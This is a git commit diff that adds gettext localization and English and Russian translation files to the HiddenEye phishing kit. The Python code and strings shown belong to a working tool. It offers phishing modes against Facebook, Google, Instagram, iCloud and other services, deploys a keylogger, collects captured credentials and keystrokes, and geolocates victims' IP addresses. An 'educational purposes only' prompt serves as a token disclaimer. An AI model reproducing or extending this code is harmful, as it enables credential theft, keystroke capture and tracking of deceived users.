Localization system development (WIP)

New - Language basic structure
New - Full English localization file
New - Full Russian localization file
This commit is contained in:
Artur Tretiak 2018-10-31 04:28:03 +02:00
parent a7ac69ffd8
commit 4ee71519a1
9 changed files with 1016 additions and 36 deletions

2
.gitignore vendored
View File

@ -26,3 +26,5 @@ Server/www/mobile\.html
Server/www/usernames\.txt
Settings\.ini
ngrok\.url

View File

@ -9,6 +9,8 @@ from urllib.request import urlopen
from subprocess import check_output
from sys import stdout, argv
from Defs.Configurations import readConfig, ifSettingsNotExists
from gettext import gettext as _
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
ifSettingsNotExists()
@ -69,8 +71,8 @@ def runPhishing(page , customOption): #Phishing pages selection menu
copy_tree("WebPages/VK_poll_method/", "Server/www/")
def selectServer(): #Question where user must select server
print("\n {0}Please select any available server:{1}".format(RED, DEFAULT))
print("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo".format(RED, DEFAULT))
print(_("\n {0}Please select any available server:{1}").format(RED, DEFAULT))
print(_("\n {0}[{1}1{0}]{1} Ngrok\n {0}[{1}2{0}]{1} Serveo").format(RED, DEFAULT))
choice = input(" \n {0}HiddenEye >>> {1}".format(RED, DEFAULT))
@ -114,7 +116,7 @@ def runServeo():
def runMainMenu(): #menu where user select what they wanna use
system('clear')
print ('''
print (_('''
{1}<=============================================================================>
@ -130,36 +132,36 @@ def runMainMenu(): #menu where user select what they wanna use
{0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]
{0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY KEYSTROKE ]
<=============================================================================>
'''.format(GREEN, DEFAULT, CYAN, RED))
''').format(GREEN, DEFAULT, CYAN, RED))
if 256 != system('which php'): #Checking if user have PHP
print (" -----------------------".format(CYAN, DEFAULT))
print ("[PHP INSTALLATION FOUND]".format(CYAN, DEFAULT))
print (_("[PHP INSTALLATION FOUND]").format(CYAN, DEFAULT))
print (" -----------------------".format(CYAN, DEFAULT))
else:
print (" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/".format(CYAN, DEFAULT))
print (_(" --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again.http://www.php.net/").format(CYAN, DEFAULT))
exit(0)
for i in range(101):
sleep(0.05)
stdout.write("\r{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait... %d%%".format(RED, DEFAULT) % i)
stdout.write(_("{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait... %d%%").format(RED, DEFAULT) % i)
stdout.flush()
if input("\n{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? ({2}y{1}/{0}n{1})\n{2}HiddenEye >>> {1}".format(CYAN, DEFAULT, RED)).upper() != 'Y': #Question where user must accept education purposes
if input(_("\n{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? ({2}y{1}/{0}n{1})\n{2}HiddenEye >>> {1}").format(CYAN, DEFAULT, RED)).upper() != 'Y': #Question where user must accept education purposes
system('clear')
print ('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n'.format(RED, DEFAULT))
print (_('\n\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n\n').format(RED, DEFAULT))
exit(0)
option = input("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
option = input(_("\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}12{0}]{1} Microsoft\n\n {0}[{1}13{0}]{1} Steam\n\n {0}[{1}14{0}]{1} VK\n\n {0}[{1}15{0}]{1} iCloud\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
if option == '1':
loadModule('Facebook')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('Facebook', customOption)
elif option == '2':
loadModule('Google')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}[{1}3{0}]{1} New Google Web\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('Google', customOption)
elif option == '3':
loadModule('LinkedIn')
@ -183,7 +185,7 @@ def runMainMenu(): #menu where user select what they wanna use
runPhishing('Twitter', customOption)
elif option == '8':
loadModule('Instagram')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n\n {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to original autoliker)\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('Instagram', customOption)
elif option == '9':
loadModule('Snapchat')
@ -207,7 +209,7 @@ def runMainMenu(): #menu where user select what they wanna use
runPhishing('Steam', customOption)
elif option == '14':
loadModule('VK')
customOption = input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}HiddenEye >>> {1}".format(RED, DEFAULT))
customOption = input(_("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n{0}HiddenEye >>> {1}").format(RED, DEFAULT))
runPhishing('VK', customOption)
elif option == '15':
loadModule('iCloud')
@ -217,14 +219,14 @@ def runMainMenu(): #menu where user select what they wanna use
exit(0)
def loadModule(module): #This one just show text..
print (''' {0}
[{1}*{0}] module loaded. Building site...{0}'''.format(RED, DEFAULT))
print (_(''' {0}
[{1}*{0}] module loaded. Building site...{0}''').format(RED, DEFAULT))
def inputCustom(): #Question where user can input custom web-link
print("\n (Choose Wisely As Your Victim Will Redirect to This Link)".format(RED, DEFAULT))
print("\n (Leave Blank To Loop The Phishing Page)".format(RED, DEFAULT))
print("\n {0}Insert a custom redirect url:".format(RED, DEFAULT))
custom = input("\n {0}CUSTOM URL>>> {1}".format(RED, DEFAULT))
print(_("\n (Choose Wisely As Your Victim Will Redirect to This Link)").format(RED, DEFAULT))
print(_("\n (Leave Blank To Loop The Phishing Page)").format(RED, DEFAULT))
print(_("\n {0}Insert a custom redirect url:").format(RED, DEFAULT))
custom = input(_("\n {0}CUSTOM URL>>> {1}").format(RED, DEFAULT))
if 'http://' in custom or 'https://' in custom:
pass
else:
@ -255,7 +257,7 @@ def runServer():
def endMessage(): #Message when HiddenEye exit
system('clear')
print ('''
print (_('''
{1}_....~~~~=====~~~~...._
.'========={3}/----=\{1}=========>
/:========={3}/-----====\{1}
@ -266,19 +268,19 @@ def endMessage(): #Message when HiddenEye exit
{3}HIDDEN EYE {3}BY: DARKSEC TEAM
{0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL
{3}https://github.com/DarkSecDevelopers/HiddenEye '''.format(GREEN, DEFAULT, CYAN, RED))
{3}https://github.com/DarkSecDevelopers/HiddenEye ''').format(GREEN, DEFAULT, CYAN, RED))
def getCredentials():
print("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n".format(CYAN, DEFAULT))
print(_("{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n").format(CYAN, DEFAULT))
while True:
with open('Server/www/usernames.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
writeLog('======================================================================'.format(RED, DEFAULT))
writeLog(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
writeLog(_(' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}').format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/usernames.txt && touch Server/www/usernames.txt')
writeLog('======================================================================'.format(RED, DEFAULT))
@ -288,21 +290,21 @@ def getCredentials():
with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
ip = re.match('Victim Public IP: (.*?)\n', lines).group(1)
ip = re.match(_('Victim Public IP: (.*?)\n'), lines).group(1)
resp = urlopen('https://ipinfo.io/%s/json' % ip)
ipinfo = json.loads(resp.read().decode(resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
log('======================================================================'.format(RED, DEFAULT))
log(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
log(_(' \n{0}[ VICTIM IP BONUS ]{1}:\n {0}%s{1}').format(GREEN, DEFAULT) % lines)
else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1)
longitude = matchObj.group(2)
writeLog('======================================================================'.format(RED, DEFAULT))
writeLog(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
writeLog(' \n{0}Longitude: %s \nLatitude: %s{1}'.format(GREEN, DEFAULT) % (longitude, latitude))
writeLog(' \n{0}ISP: %s \nCountry: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['org'], ipinfo['country']))
writeLog(' \n{0}Region: %s \nCity: %s{1}'.format(GREEN, DEFAULT) % (ipinfo['region'], ipinfo['city']))
writeLog(_(' \n{0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}').format(GREEN, DEFAULT) % lines)
writeLog(_(' \n{0}Longitude: {2} \nLatitude: {3}{1}').format(GREEN, DEFAULT, longitude, latitude))
writeLog(_(' \n{0}ISP: {2} \nCountry: {3}{1}').format(GREEN, DEFAULT, ipinfo['org'], ipinfo['country']))
writeLog(_(' \n{0}Region: {2} \nCity: {3}{1}').format(GREEN, DEFAULT, ipinfo['region'], ipinfo['city']))
system('rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
writeLog('======================================================================'.format(RED, DEFAULT))
@ -312,7 +314,7 @@ def getCredentials():
lines = creds.read().rstrip()
if len(lines) != 0:
writeLog('______________________________________________________________________'.format(RED, DEFAULT))
writeLog(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}'.format(GREEN, DEFAULT) % lines)
writeLog(_(' {0}[ GETTING PRESSED KEYS ]{1}:\n {0}%s{1}').format(GREEN, DEFAULT) % lines)
system('rm -rf Server/www/KeyloggerData.txt && touch Server/www/KeyloggerData.txt')
writeLog('______________________________________________________________________'.format(RED, DEFAULT))

View File

@ -5,30 +5,31 @@ from os import path, system
from subprocess import check_output
from platform import system as systemos, architecture
from wget import download
from gettext import gettext as _
RED, GREEN, DEFAULT = '\033[91m', '\033[1;32m', '\033[0m'
def checkConnection(host='http://duckduckgo.com'): #Connection check
try:
urlopen(host)
print("{0}Successful connection!{1}".format(GREEN, DEFAULT))
print(_("{0}Successful connection!{1}").format(GREEN, DEFAULT))
return True
except:
return False
if checkConnection() == False:
print ('''{1}
print (_('''{1}
_ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}
|__| | ] | ] | |__ |\ | {0}|__ \__/ |__{1}
| | | ]__| ]__| |__ | \| {0}|__ || |__{1}
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, DEFAULT))
''').format(RED, DEFAULT))
exit(0)
def checkNgrok(): #Ngrok check
if path.isfile('Server/ngrok') == False: #Is Ngrok downloaded?
print('[*] Downloading Ngrok...')
print(_('[*] Downloading Ngrok...'))
if 'Android' in str(check_output(('uname', '-a'))):
filename = 'ngrok-stable-linux-arm.zip'
else:

View File

@ -1 +1,2 @@
#WILL BE SOON!!!
#Work in process!!!

View File

@ -1,12 +1,13 @@
#!/usr/bin/python3
#HiddenEye by Open Source Community
import multiprocessing
import gettext
from gettext import gettext as _
from Defs.Checks import *
from Defs.Configurations import *
from Defs.Actions import *
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
checkConnection()

Binary file not shown.

View File

@ -0,0 +1,485 @@
msgid ""
msgstr ""
"Project-Id-Version: hiddeneye\n"
"POT-Creation-Date: 2018-10-31 03:33+0200\n"
"PO-Revision-Date: 2018-10-31 03:41+0200\n"
"Last-Translator: sTiKyt <stikyt@protonmail.com>\n"
"Language-Team: \n"
"Language: en_US\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Poedit 2.2\n"
"X-Poedit-Basepath: ../../..\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"
"X-Poedit-SearchPath-0: Lang\n"
"X-Poedit-SearchPath-1: Defs\n"
#: Defs/Actions.py:74
#, python-brace-format
msgid ""
"\n"
" {0}Please select any available server:{1}"
msgstr ""
"\n"
" {0}Please select any available server:{1}"
#: Defs/Actions.py:75
#, python-brace-format
msgid ""
"\n"
" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
msgstr ""
"\n"
" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
#: Defs/Actions.py:119
#, python-brace-format
msgid ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} BY:DARKSEC{2}\n"
" {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]\n"
" {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY "
"KEYSTROKE ]\n"
"<=============================================================================>\n"
" "
msgstr ""
"\n"
"\n"
"\n"
"{1}"
"<=============================================================================>\n"
" || "
"||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ███ ██ {3}███████ ██ ██ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ {3}██ ██ ██ "
"██ {1}||\n"
" {1}|| ███████ ██ ██ ██ ██ ██ ███████ ██ ██ ██ {3}███████ ████ "
"███████ {1}||\n"
" {1}|| ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ {3}██ ██ "
"██ {1}||\n"
" {1}|| ██ ██ ██ ██████ ██████ ███████ ██ ███ {3}███████ ██ "
"███████ {1}||\n"
" || "
"||\n"
" -----------------------------------------------------------------------------\n"
" v{3}0{1}.{3}1{1}.{3}"
"0{1} BY:DARKSEC{2}\n"
" {0}[ NOW WITH LIVE VICTIM ATTACK INFORMATION ]\n"
" {0}A KEYLOGGER WILL BE DEPLOYED FOR YOU, TO CAPTURE EVERY "
"KEYSTROKE ]\n"
"<=============================================================================>\n"
" "
#: Defs/Actions.py:150
#, python-format, python-brace-format
msgid "{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait... %d%%"
msgstr "{0}[{1}*{0}]{1} HiddenEye is Opening. Please Wait... %d%%"
#: Defs/Actions.py:153
#, python-brace-format
msgid ""
"\n"
"{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? "
"({2}y{1}/{0}n{1})\n"
"{2}HiddenEye >>> {1}"
msgstr ""
"\n"
"{2}[{1}!{2}]{1} Do you agree to use this tool for educational purposes only? "
"({2}y{1}/{0}n{1})\n"
"{2}HiddenEye >>> {1}"
#: Defs/Actions.py:155
#, python-brace-format
msgid ""
"\n"
"\n"
"[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR "
"EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n"
"\n"
msgstr ""
"\n"
"\n"
"[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU CAN ONLY USE IT FOR "
"EDUCATIONAL PURPOSE. GOOD BYE!{1} ]\n"
"\n"
#: Defs/Actions.py:157
#, python-brace-format
msgid ""
"\n"
"SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n"
"\n"
" {0}[{1}1{0}]{1} Facebook\n"
"\n"
" {0}[{1}2{0}]{1} Google\n"
"\n"
" {0}[{1}3{0}]{1} LinkedIn\n"
"\n"
" {0}[{1}4{0}]{1} GitHub\n"
"\n"
" {0}[{1}5{0}]{1} StackOverflow\n"
"\n"
" {0}[{1}6{0}]{1} WordPress\n"
"\n"
" {0}[{1}7{0}]{1} Twitter\n"
"\n"
" {0}[{1}8{0}]{1} Instagram\n"
"\n"
" {0}[{1}9{0}]{1} Snapchat\n"
"\n"
" {0}[{1}10{0}]{1} Yahoo\n"
"\n"
" {0}[{1}11{0}]{1} Twitch\n"
"\n"
" {0}[{1}12{0}]{1} Microsoft\n"
"\n"
" {0}[{1}13{0}]{1} Steam\n"
"\n"
" {0}[{1}14{0}]{1} VK\n"
"\n"
" {0}[{1}15{0}]{1} iCloud\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:160
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/"
"login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/"
"login_with)\n"
"\n"
" {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n"
"\n"
" {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:164
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} New Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
" {0}[{1}3{0}]{1} New Google Web\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:188
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to "
"original autoliker)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard Instagram Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Instagram Autoliker Phising (After submit redirects to "
"original autoliker)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:212
#, python-brace-format
msgid ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
msgstr ""
"\n"
"Operation mode:\n"
"\n"
" {0}[{1}1{0}]{1} Standard VK Web Page Phishing\n"
"\n"
" {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n"
"\n"
"{0}HiddenEye >>> {1}"
#: Defs/Actions.py:222
#, python-brace-format
msgid ""
" {0}\n"
" [{1}*{0}] module loaded. Building site...{0}"
msgstr ""
" {0}\n"
" [{1}*{0}] module loaded. Building site...{0}"
#: Defs/Actions.py:226
msgid ""
"\n"
" (Choose Wisely As Your Victim Will Redirect to This Link)"
msgstr ""
"\n"
" (Choose Wisely As Your Victim Will Redirect to This Link)"
#: Defs/Actions.py:227
msgid ""
"\n"
" (Leave Blank To Loop The Phishing Page)"
msgstr ""
"\n"
" (Leave Blank To Loop The Phishing Page)"
#: Defs/Actions.py:228
#, python-brace-format
msgid ""
"\n"
" {0}Insert a custom redirect url:"
msgstr ""
"\n"
" {0}Insert a custom redirect url:"
#: Defs/Actions.py:229
#, python-brace-format
msgid ""
"\n"
" {0}CUSTOM URL>>> {1}"
msgstr ""
"\n"
" {0}CUSTOM URL >>> {1}"
#: Defs/Actions.py:260
#, python-brace-format
msgid ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}BY: DARKSEC TEAM\n"
" {0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
msgstr ""
"\n"
" {1}_....~~~~=====~~~~...._\n"
" .'========={3}/----=\\{1}=========>\n"
" /:========={3}/-----====\\{1}\n"
" |=========={3}|-----======|{1}==========>\n"
" \\:========={3}\\---======/{1}\n"
" \\=========={3}\\=====/{1}==========>\n"
" ````~~~~=======~~~~````\n"
"\n"
" {3}HIDDEN EYE {3}BY: DARKSEC TEAM\n"
" {0}THANKS FOR USING IT. HELP US TO MAKE IT MORE USEFUL\n"
" {3}https://github.com/DarkSecDevelopers/HiddenEye "
#: Defs/Actions.py:277
#, python-brace-format
msgid ""
"{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n"
msgstr ""
"{0}[{1}*{0}]{1} Waiting for credentials//Keystrokes//Victim's device info. \n"
#: Defs/Actions.py:283
#, python-format, python-brace-format
msgid ""
" {0}[ CREDENTIALS FOUND ]{1}:\n"
" {0}%s{1}"
msgstr ""
" {0}[ CREDENTIALS FOUND ]{1}:\n"
" {0}%s{1}"
#: Defs/Actions.py:293
msgid "Victim Public IP: (.*?)\n"
msgstr "Victim Public IP: (.*?)\n"
#: Defs/Actions.py:298
#, python-format, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM IP BONUS ]{1}:\n"
" {0}%s{1}"
msgstr ""
" \n"
"{0}[ VICTIM IP BONUS ]{1}:\n"
" {0}%s{1}"
#: Defs/Actions.py:304
#, python-format, python-brace-format
msgid ""
" \n"
"{0}[ VICTIM INFO FOUND ]{1}:\n"
" {0}%s{1}"
msgstr ""
" \n"
"{0}[ VICTIM INFO FOUND ]{1}:\n"
" {0}%s{1}"
#: Defs/Actions.py:305
#, python-brace-format
msgid ""
" \n"
"{0}Longitude: {2} \n"
"Latitude: {3}{1}"
msgstr ""
" \n"
"{0}Longitude: {2} \n"
"Latitude: {3}{1}"
#: Defs/Actions.py:306
#, python-brace-format
msgid ""
" \n"
"{0}ISP: {2} \n"
"Country: {3}{1}"
msgstr ""
" \n"
"{0}ISP: {2} \n"
"Country: {3}{1}"
#: Defs/Actions.py:307
#, python-brace-format
msgid ""
" \n"
"{0}Region: {2} \n"
"City: {3}{1}"
msgstr ""
" \n"
"{0}Region: {2} \n"
"City: {3}{1}"
#: Defs/Actions.py:317
#, python-format, python-brace-format
msgid ""
" {0}[ GETTING PRESSED KEYS ]{1}:\n"
" {0}%s{1}"
msgstr ""
" {0}[ GETTING PRESSED KEYS ]{1}:\n"
" {0}%s{1}"
#: Defs/Checks.py:15
#, python-brace-format
msgid "{0}Successful connection!{1}"
msgstr "{0}Successful connection!{1}"
#: Defs/Checks.py:21
#, python-brace-format
msgid ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Network error. Verify your connection.\n"
"\n"
msgstr ""
"{1}\n"
" _ _ . ___ ___ ___ _ _ {0}___ _ _ ___{1}\n"
" |__| | ] | ] | |__ |\\ | {0}|__ \\__/ |__{1}\n"
" | | | ]__| ]__| |__ | \\| {0}|__ || |__{1}\n"
"\n"
" {0}[{1}!{0}]{1} Network error. Verify your connection.\n"
"\n"
#: Defs/Checks.py:32
msgid "[*] Downloading Ngrok..."
msgstr "[*] Downloading Ngrok..."

Binary file not shown.

View File

@ -0,0 +1,488 @@
msgid ""
msgstr ""
"Project-Id-Version: \n"
"POT-Creation-Date: 2018-10-31 03:42+0200\n"
"PO-Revision-Date: 2018-10-31 04:20+0200\n"
"Last-Translator: sTiKyt <stikyt@protonmail.com>\n"
"Language-Team: \n"
"Language: ru_RU\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Generator: Poedit 2.2\n"
"X-Poedit-Basepath: ../../..\n"
"Plural-Forms: nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : n%10>=2 && n"
"%10<=4 && (n%100<12 || n%100>14) ? 1 : 2);\n"
"X-Poedit-SearchPath-0: Lang\n"
"X-Poedit-SearchPath-1: Defs\n"
#: Defs/Actions.py:74
#, python-brace-format
msgid ""
"\n"
" {0}Please select any available server:{1}"
msgstr ""
"\n"
"{0}Пожалуйста выберите сервер из списка:{1}"
#: Defs/Actions.py:75
#, python-brace-format
msgid ""
"\n"
" {0}[{1}1{0}]{1} Ngrok\n"
" {0}[{1}2{0}]{1} Serveo"
msgstr ""
"\n"
